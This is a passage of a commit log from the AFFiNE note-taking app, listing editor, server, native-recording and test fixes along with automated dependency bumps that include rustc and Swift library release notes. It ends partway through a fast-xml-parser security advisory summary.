* Submission accepts richer transcription input; results return
source‑audio metadata, slice manifest, quality indicators, normalized
segments/transcript, and structured summary JSON.

* **Frontend**
* Recording flow stores transcription metadata and uploads preprocessed
audio slices with slice/quality info; UI-side result normalization
applied.

* **Tests**
* Expanded unit, contract, and e2e coverage for normalization, payload
parsing, persistence/retry, and end‑to‑end transcription flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-26 21:32:36 +08:00
Aisha Roslan a3379c8979 fix(editor): font weight dropdown empty on Chrome/Safari in edgeless mode (#14725)
### Summary
Resolves #14528. Normalizes font family string before comparison.
Removes browser dependency.

### What Changed
On Edgeless mode, font dropdown was not appearing for shapes on Chrome.
Now, it appears on Chrome, Safari, and Firefox.

### Screenshot Verification
**Google Chrome**
<img width="623" height="322" alt="Screenshot 2026-03-25 at 1 24 51 PM"
src="https://github.com/user-attachments/assets/fb05790d-6842-43ce-a014-2b24d15bc80d"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved font matching to be more tolerant of whitespace, quotes, and
casing so font family comparisons are consistent across browsers,
reducing incorrect font fallbacks and visual mismatches.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-26 06:49:10 +00:00
DarkSky 166372cc3e fix: test in mac (#14712)
#### PR Dependency Tree


* **PR #14712** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced Electron test environment cleanup with improved termination
signal handling and child process resource management.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-24 09:59:10 +08:00
DarkSky 9b56a05159 feat(native): async recorder (#14700)
#### PR Dependency Tree


* **PR #14700** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Durable, resumable import queue with explicit import lifecycle and
updated popup/tray status behavior.
* Async native recording APIs and ability to abort recordings; audio
quality metrics (degraded, overflow count).
  * Added "Importing..." translation.

* **Bug Fixes**
* More reliable single-claim import processing, retries and cleanup to
avoid duplicate imports.
  * Improved stop/abort teardown stability and safer shutdown behavior.

* **Tests**
* New/updated tests covering coordinator, import queue, native async
flows and teardown scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-23 22:38:52 +08:00
renovate[bot] b0251c93cb chore: bump up rustc version to v1.94.0 (#14701)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.93.1` → `1.94.0` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

### [`v1.94.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1940-2026-03-05)

[Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.93.1...1.94.0)

<a id="1.94.0-Language"></a>

## Language

- [Impls and impl items inherit `dead_code` lint level of the
corresponding traits and trait
items](https://redirect.github.com/rust-lang/rust/pull/144113)
- [Stabilize additional 29 RISC-V target features including large
portions of the RVA22U64 / RVA23U64
profiles](https://redirect.github.com/rust-lang/rust/pull/145948)
- [Add warn-by-default `unused_visibilities` lint for visibility on
`const _`
declarations](https://redirect.github.com/rust-lang/rust/pull/147136)
- [Update to Unicode
17](https://redirect.github.com/rust-lang/rust/pull/148321)
- [Avoid incorrect lifetime errors for
closures](https://redirect.github.com/rust-lang/rust/pull/148329)

<a id="1.94.0-Platform-Support"></a>

## Platform Support

- [Add `riscv64im-unknown-none-elf` as a tier 3
target](https://redirect.github.com/rust-lang/rust/pull/148790)

Refer to Rust's [platform support page][platform-support-doc]
for more information on Rust's tiered platform support.

[platform-support-doc]:
https://doc.rust-lang.org/rustc/platform-support.html

<a id="1.94.0-Libraries"></a>

## Libraries

- [Relax `T: Ord` bound for some `BinaryHeap<T>`
methods.](https://redirect.github.com/rust-lang/rust/pull/149408)

<a id="1.94.0-Stabilized-APIs"></a>

## Stabilized APIs

- [`<[T]>::array_windows`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.array_windows)
- [`<[T]>::element_offset`](https://doc.rust-lang.org/stable/std/primitive.slice.html#method.element_offset)
- [`LazyCell::get`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get)
- [`LazyCell::get_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.get_mut)
- [`LazyCell::force_mut`](https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#method.force_mut)
- [`LazyLock::get`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get)
- [`LazyLock::get_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.get_mut)
- [`LazyLock::force_mut`](https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#method.force_mut)
- [`impl TryFrom<char> for usize`](https://doc.rust-lang.org/stable/std/convert/trait.TryFrom.html#impl-TryFrom%3Cchar%3E-for-usize)
- [`std::iter::Peekable::next_if_map`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map)
- [`std::iter::Peekable::next_if_map_mut`](https://doc.rust-lang.org/stable/std/iter/struct.Peekable.html#method.next_if_map_mut)
- [x86 `avx512fp16` intrinsics](https://redirect.github.com/rust-lang/rust/issues/127213)
  (excluding those that depend directly on the unstable `f16` type)
- [AArch64 NEON fp16 intrinsics](https://redirect.github.com/rust-lang/rust/issues/136306)
  (excluding those that depend directly on the unstable `f16` type)
- [`f32::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f32/consts/constant.EULER_GAMMA.html)
- [`f64::consts::EULER_GAMMA`](https://doc.rust-lang.org/stable/std/f64/consts/constant.EULER_GAMMA.html)
- [`f32::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f32/consts/constant.GOLDEN_RATIO.html)
- [`f64::consts::GOLDEN_RATIO`](https://doc.rust-lang.org/stable/std/f64/consts/constant.GOLDEN_RATIO.html)

These previously stable APIs are now stable in const contexts:

- [`f32::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f32.html#method.mul_add)
- [`f64::mul_add`](https://doc.rust-lang.org/stable/std/primitive.f64.html#method.mul_add)

<a id="1.94.0-Cargo"></a>

## Cargo

- Stabilize the config include key. The top-level include config key
allows loading additional config files, enabling better organization,
sharing, and management of Cargo configurations across projects and
environments.
[docs](https://doc.rust-lang.org/nightly/cargo/reference/config.html#including-extra-configuration-files)
[#16284](https://redirect.github.com/rust-lang/cargo/pull/16284)
- Stabilize the pubtime field in registry index. This records when a
crate version was published and enables time-based dependency resolution
in the future. Note that crates.io will gradually backfill existing
packages when a new version is published. Not all crates have pubtime
yet.
[#16369](https://redirect.github.com/rust-lang/cargo/pull/16369)
[#16372](https://redirect.github.com/rust-lang/cargo/pull/16372)
- Cargo now parses [TOML v1.1](https://toml.io/en/v1.1.0) for manifests
and configuration files. Note that using these features in Cargo.toml
will raise your development MSRV, but the published manifest remains
compatible with older parsers.
[#16415](https://redirect.github.com/rust-lang/cargo/pull/16415)
- [Make `CARGO_BIN_EXE_<crate>` available at runtime
](https://redirect.github.com/rust-lang/cargo/pull/16421/)

<a id="1.94.0-Compatibility-Notes"></a>

## Compatibility Notes

- [Forbid freely casting lifetime bounds of
`dyn`-types](https://redirect.github.com/rust-lang/rust/pull/136776)
- [Make closure capturing have consistent and correct behaviour around
patterns](https://redirect.github.com/rust-lang/rust/pull/138961)
Some finer details of how precise closure captures get affected by
pattern matching have been changed. In some cases, this can cause a
non-move closure that was previously capturing an entire variable by
move, to now capture only part of that variable by move, and other parts
by borrow. This can cause the borrow checker to complain where it
previously didn't, or cause `Drop` to run at a different point in time.
- [Standard library macros are now imported via prelude, not via
injected
`#[macro_use]`](https://redirect.github.com/rust-lang/rust/pull/139493)
  This will raise an error if macros of the same name are glob imported.
For example if a crate defines their own `matches` macro and then glob
imports that,
it's now ambiguous whether the custom or standard library `matches` is
meant and
  an explicit import of the name is required to resolve the ambiguity.
One exception is `core::panic` and `std::panic`, if their import is
ambiguous
a new warning
([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319))
is raised.
This may raise a new warning
([`ambiguous_panic_imports`](https://redirect.github.com/rust-lang/rust/issues/147319))
on `#![no_std]` code glob importing the std crate.
Both `core::panic!` and `std::panic!` are then in scope and which is
used is ambiguous.
- [Don't strip shebang in expression-context
`include!(…)`s](https://redirect.github.com/rust-lang/rust/pull/146377)
This can cause previously working includes to no longer compile if they
included files which started with a shebang.
- [Ambiguous glob reexports are now also visible
cross-crate](https://redirect.github.com/rust-lang/rust/pull/147984)
This unifies behavior between local and cross-crate errors on these
exports, which may introduce new ambiguity errors.
- [Don't normalize where-clauses before checking
well-formedness](https://redirect.github.com/rust-lang/rust/pull/148477)
- [Introduce a future compatibility warning on codegen attributes on
body-free trait
methods](https://redirect.github.com/rust-lang/rust/pull/148756)
  These attributes currently have no effect in this position.
- [On Windows `std::time::SystemTime::checked_sub_duration` will return
`None` for times before the Windows epoch
(1/1/1601)](https://redirect.github.com/rust-lang/rust/pull/148825)
- [Lifetime identifiers such as `'a` are now NFC
normalized](https://redirect.github.com/rust-lang/rust/pull/149192).
- [Overhaul filename handling for cross-compiler
consistency](https://redirect.github.com/rust-lang/rust/pull/149709)
Any paths emitted by compiler now always respect the relative-ness of
the paths and `--remap-path-prefix` given originally.
One side-effect of this change is that paths emitted for local crates in
Cargo (path dependencies and workspace members) are no longer absolute
but relative when emitted as part of a diagnostic in a downstream crate.

<a id="1.94.0-Internal-Changes"></a>

## Internal Changes

These changes do not affect any public interfaces of Rust, but they
represent
significant improvements to the performance or internals of rustc and
related
tools.

- [Switch to `annotate-snippets` for error
emission](https://redirect.github.com/rust-lang/rust/pull/150032)
  This should preserve mostly the same outputs in rustc error messages.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-23 21:13:22 +08:00
DarkSky 5d124ee55b feat(server): improve subscription sync stability (#14703) 2026-03-23 21:13:00 +08:00
DarkSky dcf041a3f2 fix(editor): ci stability (#14704)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved Electron shutdown, diagnostics and tab teardown for more
reliable exits and forced cleanup on stubborn processes.
* **Tests**
* Added polling-based test helpers, stronger scroll/page readiness,
timeout-tolerant page selection, and async cleanup/worker teardown;
updated many tests to wait for UI/model updates and rendering frames.
* **Bug Fixes**
* Reduced flakiness by awaiting paragraph visibility, nested counts,
selection/navigation stability, tab counts, post-action renders, and
safer element interactions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-23 16:25:15 +08:00
renovate[bot] 8ba02ed6fb chore: bump up RevenueCat/purchases-ios-spm version to from: "5.66.0" (#14699)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.60.0"` → `from: "5.66.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary>

### [`v5.66.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.65.0...5.66.0)

### [`v5.65.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5650)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.64.0...5.65.0)

#### 5.65.0

### [`v5.64.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5640)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.63.0...5.64.0)

#### 5.64.0

### [`v5.63.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5630)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.62.0...5.63.0)

#### 5.63.0

### [`v5.62.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5620)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.61.0...5.62.0)

#### 5.62.0

### [`v5.61.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5610)

[Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.60.0...5.61.0)

#### 5.61.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-22 04:03:11 +08:00
renovate[bot] ffa3ff9d7f chore: bump up apple/swift-collections version to from: "1.4.1" (#14697)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | patch | `from: "1.4.0"` → `from: "1.4.1"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

### [`v1.4.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.4.1): Swift Collections 1.4.1

[Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.4.0...1.4.1)
This patch release is mostly focusing on evolving the package traits
`UnstableContainersPreview` and `UnstableHashedContainers`, with the
following notable fixes and improvements to the stable parts of the
package:

- Make the package documentation build successfully on the DocC that
ships in Swift 6.2.
- Avoid using floating point arithmetic to size collection storage in
the `DequeModule` and `OrderedCollections` modules.

#### Changes to experimental package traits

The new set and dictionary types enabled by the
`UnstableHashedContainers` trait have now resolved several correctness
issues in their implementation of insertions. They have also gained some
low-hanging performance optimizations. Like before, these types are in
"working prototype" phase, and while they have working implementations
of basic primitive operations, we haven't done much work validating
their performance yet. Feedback from intrepid early adopters would be
very welcome.

The `UnstableContainersPreview` trait has gained several new protocols
and algorithm implementations, working towards one possible working
model of a coherent, ownership-aware container/iteration model.

- [`BidirectionalContainer`][BidirectionalContainer] defines a container
that allows iterating over spans backwards, and provides decrement
operations on indices -- an analogue of the classic
`BidirectionalCollection` protocol.
- [`RandomAccessContainer`][RandomAccessContainer] models containers
that allow constant-time repositioning of their indices, like
`RandomAccessCollection`.
- [`MutableContainer`][MutableContainer] is the ownership-aware analogue
of `MutableCollection` -- it models a container type that allows its
elements to be arbitrarily reordered and mutated/reassigned without
changing the shape of the data structure (that is to say, without
invalidating any indices).
- [`PermutableContainer`][PermutableContainer] is an experimental new
spinoff of `MutableContainer`, focusing on reordering items without
allowing arbitrary mutations.
- [`RangeReplaceableContainer`][RangeReplaceableContainer] is a partial,
ownership-aware analogue of `RangeReplaceableCollection`, providing a
full set of insertion/append/removal/consumption operations, with
support for fixed-capacity conforming types.
- [`DynamicContainer`][DynamicContainer] rounds out the
range-replacement operations with initializer and capacity reservation
requirements that can only be implemented by dynamically sized
containers.

[BidirectionalContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/BidirectionalContainer.swift

[RandomAccessContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RandomAccessContainer.swift

[MutableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/MutableContainer.swift

[PermutableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/PermutableContainer.swift

[RangeReplaceableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RangeReplaceableContainer.swift

[DynamicContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/DynamicContainer.swift

- We now have [working reference
implementations](https://redirect.github.com/apple/swift-collections/tree/main/Sources/ContainersPreview/Protocols)
of lazy `map`, `reduce` and `filter` operations on borrowing iterators,
producers and drains, as well as a `collect(into:)` family of methods to
supply "greedy" variants, generating items into a container of the
user's choice. Importantly, the algorithms tend to be defined on the
iterator types, rather than directly on some sequence/container -- going
this way has some interesting benefits (explicitness, no confusion
between the various flavors or the existing `Sequence` algorithms), but
they also have notable drawbacks (minor design issues with the borrowing
iterator protocol, unknowns on how the pattern would apply to container
algorithms, etc.).

```swift
    let items: RigidArray<Int> = ...
    let transformed = 
      items.makeBorrowingIterator() // obviously we'd want a better name here, like `borrow()`
      .map { 2 * $0 }
      .collect(into: UniqueArray.self)
    // `transformed` is a UniqueArray instance holding all values in `items`, doubled up 
```

```swift
    let items: RigidArray = ...
    let transformed = 
       items.makeBorrowingIterator()
      .filter { !$0.isMultiple(of: 7) }
      .copy()
      .collect(into: UniqueArray.self)
    // `transformed` holds a copy of all values in `items` that aren't a multiple of 7
```

```swift
    let items: RigidArray = ...
    let transformed = 
       items.consumeAll()
      .filter { !$0.isMultiple(of: 7) }
      .collect(into: UniqueArray.self)
    // `transformed` holds all values that were previously in `items` that aren't a multiple of 7. `items` is now empty.
```

Like before, these are highly experimental, and they will definitely
change in dramatic/radical ways on the way to stabilization. Note that
there is no project- or team-wide consensus on any of these constructs.
I'm publishing them primarily as a crucial reference point, and to gain
a level of shared understanding of the actual problems that need to be
resolved, and the consequences of the design path we are on.

#### What's Changed

- Add some decorative badges in the README by
[@lorentey](https://redirect.github.com/lorentey) in
[#591](https://redirect.github.com/apple/swift-collections/pull/591)
- \[Dequemodule, OrderedCollections] Avoid using floating point
arithmetic by [@lorentey](https://redirect.github.com/lorentey)
in
[#592](https://redirect.github.com/apple/swift-collections/pull/592)
- Enforce dress code for license headers by
[@lorentey](https://redirect.github.com/lorentey) in
[#593](https://redirect.github.com/apple/swift-collections/pull/593)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.7 to 0.0.8 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#595](https://redirect.github.com/apple/swift-collections/pull/595)
- Documentation updates for latest DocC by
[@lorentey](https://redirect.github.com/lorentey) in
[#596](https://redirect.github.com/apple/swift-collections/pull/596)
- \[BasicContainers] Allow standalone use of the
UnstableHashedContainers trait by
[@lorentey](https://redirect.github.com/lorentey) in
[#597](https://redirect.github.com/apple/swift-collections/pull/597)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.7 to 0.0.8 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#594](https://redirect.github.com/apple/swift-collections/pull/594)
- \[ContainersPreview] Rename Producer.generateNext() to next() by
[@lorentey](https://redirect.github.com/lorentey) in
[#599](https://redirect.github.com/apple/swift-collections/pull/599)
- \[ContainersPreview] Remove BorrowingSequence.first by
[@lorentey](https://redirect.github.com/lorentey) in
[#598](https://redirect.github.com/apple/swift-collections/pull/598)
- \[CI] Enable Android testing by
[@marcprux](https://redirect.github.com/marcprux) in
[#558](https://redirect.github.com/apple/swift-collections/pull/558)
- \[BasicContainers] Assorted hashed container fixes and improvements by
[@lorentey](https://redirect.github.com/lorentey) in
[#601](https://redirect.github.com/apple/swift-collections/pull/601)
- Flesh out BorrowingSequence/Container/Producer model a little more by
[@lorentey](https://redirect.github.com/lorentey) in
[#603](https://redirect.github.com/apple/swift-collections/pull/603)
- More exploration of ownership-aware container/iterator algorithms by
[@lorentey](https://redirect.github.com/lorentey) in
[#605](https://redirect.github.com/apple/swift-collections/pull/605)

#### New Contributors

- [@marcprux](https://redirect.github.com/marcprux) made their
first contribution in
[#558](https://redirect.github.com/apple/swift-collections/pull/558)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.4.0...1.4.1>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-22 02:52:07 +08:00
DarkSky f47ee2bc8a feat(server): improve indexer (#14698)
fix #13862 


#### PR Dependency Tree


* **PR #14698** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Enhanced search support for Chinese, Japanese, and Korean languages
with improved text segmentation and character matching.
* Added index management capabilities with table recreation
functionality.

* **Bug Fixes**
* Improved search accuracy for non-Latin scripts through updated
morphology and n-gram configuration.

* **Chores**
  * Added database migration for search index optimization.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-22 02:50:59 +08:00
DarkSky bcf2a51d41 feat(native): record encoding (#14188)
fix #13784 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Start/stop system or meeting recordings with Ogg/Opus artifacts and
native start/stop APIs; workspace backup recovery.

* **Refactor**
* Simplified recording lifecycle and UI flows; native runtime now
orchestrates recording/processing and reporting.

* **Bug Fixes**
* Stronger path validation, safer import/export dialogs, consistent
error handling/logging, and retry-safe recording processing.

* **Chores**
* Added cross-platform native audio capture and Ogg/Opus encoding
support.

* **Tests**
* New unit, integration, and e2e tests for recording, path guards,
dialogs, and workspace recovery.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-22 02:50:14 +08:00
DarkSky 6a93566422 chore: bump deps (#14690)
#### PR Dependency Tree


* **PR #14690** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated package manager and development tooling to latest compatible
versions.
* Updated backend framework and monitoring dependencies to latest
minor/patch releases.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 05:23:03 +08:00
DarkSky 7ac8b14b65 feat(editor): migrate typst mermaid to native (#14499)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native/WASM Mermaid and Typst SVG preview rendering on desktop and
mobile, plus cross-platform Preview plugin integrations.

* **Improvements**
* Centralized, sanitized rendering bridge with automatic Typst
font-directory handling and configurable native renderer selection.
* More consistent and robust error serialization and worker-backed
preview flows for improved stability and performance.

* **Tests**
* Extensive unit and integration tests for preview rendering, font
discovery, sanitization, and error serialization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:04:40 +08:00
DarkSky 16a8f17717 feat(server): improve oidc compatibility (#14686)
fix #13938 
fix #14683 
fix #14532

#### PR Dependency Tree


* **PR #14686** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Flexible OIDC claim mapping for email/name, automatic OIDC discovery
retry with exponential backoff, and explicit OAuth flow modes (popup vs
redirect) propagated through the auth flow.

* **Bug Fixes**
* Stricter OIDC email validation, clearer error messages listing
attempted claim candidates, and improved callback redirect handling for
various flow scenarios.

* **Tests**
* Added unit tests covering OIDC behaviors, backoff scheduler/promise
utilities, and frontend OAuth flow parsing/redirect logic.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:02:37 +08:00
DarkSky 1ffb8c922c fix(native): cleanup deleted docs and blobs (#14689) 2026-03-20 04:00:25 +08:00
DarkSky daf536f77a fix(native): misalignment between index clock and snapshot clock (#14688)
fix #14191

#### PR Dependency Tree


* **PR #14688** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved indexer synchronization timing for clock persistence to
prevent premature completion signals
  * Enhanced document-level indexing status tracking accuracy
  * Optimized refresh behavior for better state consistency

* **Chores**
  * Updated indexer versioning system

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 02:09:11 +08:00
congzhou09 0d2d4bb6a1 fix(editor): note-edgeless-block loses edit state during shift-click range selection (#14675)
### Problem
●In edgeless mode, when using Shift + click to perform range selection
inside an editing `note-edgeless-block` (click at the starting point,
then hold Shift and click at the end point), the block will unexpectedly
lose its editing and selection state. As a result, subsequent operations
on the selection - such as deleting and moving - no longer work.

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/82c68683-e002-4a58-b011-fe59f7fc9f02

### Solution
●The reason is that this "Shift + click" behavior is being handled by
the default multi-selection logic, which toggles selection mode and
exits the editing state. So I added an `else-if` branch to match this
case.

### After
●The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/18d61108-2089-4def-b2dc-ae13fc5ac333

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved selection behavior during note editing in multi-select mode
to provide more intuitive interaction when using range selection during
active editing.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 22:22:22 +08:00
Mohad cb9897d493 fix(i18n): support Arabic comma separator in date-picker weekDays and monthNames (#14663)
## Problem

The Arabic locale strings in `ar.json` use the Arabic comma `،` (U+060C)
as separator:

```json
"com.affine.calendar-date-picker.week-days": "أ،إث،ث،أر،خ،ج،س"
```

But `day-picker.tsx` splits on ASCII comma only — causing all
weekday/month names to render as a single unsplit string in Arabic
locale.

## Fix

Change `.split(',')` to `.split(/[,،]/)` in two call sites — matches
both ASCII and Arabic comma.

## Impact

One-line fix per call site. No other functionality affected. All
non-Arabic locales unchanged.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Date picker rendering updated to correctly handle both ASCII and
Arabic/Persian comma formats when determining month and weekday labels.
This fixes inconsistent header and month-name displays in locales using
different comma characters while preserving existing interactions and
behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 22:21:51 +08:00
Ishan Goswami 8ca8333cd6 chore(server): update exa search tool description (#14682)
Updated the Exa search tool description to better reflect what Exa does.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Clarified the web search tool description to state it uses Exa, a web
search API optimized for AI applications to improve labeling and user
understanding.
* No functional or behavioral changes to the tool; this update affects
only the displayed description users see.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com>
Co-authored-by: ishan <ishan@exa.ai>
2026-03-19 05:42:04 +08:00
George Kapetanakis 3bf2503f55 fix(tools): improve sed error handling in set-version script (#14684)
## Summary
Replace post-command status checks with inline failure handling around
`sed` calls.
In the stream update path, ensure the two `sed` operations are treated
as one success/failure unit.
Keep behavior and file outputs the same on success, while making failure
handling explicit.

## Why
When `set -e` is enabled (which the script itself enables) command
failures cause the script to exit, making error handling by checking
`$?` not work.

## Files affected
- `set-version.sh`

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Enhanced error handling in version management script with improved
failure reporting and context information.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 05:36:41 +08:00
DarkSky 59fd942f40 fix(editor): database detail style (#14680)
fix #13923


#### PR Dependency Tree


* **PR #14680** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Refined styling and alignment for number field displays in the
database view component.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 14:58:53 +08:00
DarkSky d6d5ae6182 fix(electron): create doc shortcut should follow default type in settings (#14678) 2026-03-18 14:58:22 +08:00
renovate[bot] c1a09b951f chore: bump up fast-xml-parser version to v5.5.6 [SECURITY] (#14676)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser) | [`5.4.1` → `5.5.6`](https://renovatebot.com/diffs/npm/fast-xml-parser/5.4.1/5.5.6) | ![age](https://developer.mend.io/api/mc/badges/age/npm/fast-xml-parser/5.5.6?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/fast-xml-parser/5.4.1/5.5.6?slim=true) |

### GitHub Vulnerability Alerts

####
[CVE-2026-33036](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r)

## Summary

The fix for CVE-2026-26278 added entity expansion limits
(`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`,
